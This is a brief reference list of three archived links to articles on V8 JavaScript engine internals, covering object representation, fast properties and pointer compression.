V8 Object representation – http://web.archive.org/web/20210203161224/https://www.jayconrod.com/posts/52/a-tour-of-v8--object-representation

Fast properties – https://web.archive.org/web/20210326133458/https://v8.dev/blog/fast-properties

Pointer Compression in V8 – https://web.archive.org/web/20230512101949/https://v8.dev/blog/pointer-compression
